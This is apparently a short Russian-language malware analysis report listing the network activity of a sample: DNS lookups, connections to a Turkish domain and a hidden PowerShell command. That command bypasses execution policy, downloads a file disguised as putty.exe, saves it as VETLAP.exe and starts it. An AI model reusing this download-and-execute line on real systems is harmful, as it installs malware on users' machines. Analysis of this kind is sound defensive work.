Техническая информация
- http://testcenter.com.tr/file/putty.exe как %homepath%\vetlap.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://testcenter.com.tr/file/putty.exe','%USERPROFILE%\VETLAP.exe');Start-P...
- 'te####nter.com.tr':80
- 'te####nter.com.tr':443
- http://te####nter.com.tr/file/putty.exe
- 'te####nter.com.tr':443
- DNS ASK te####nter.com.tr
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://testcenter.com.tr/file/putty.exe','%USERPROFILE%\VETLAP.exe');Start-P...' (со скрытым окном)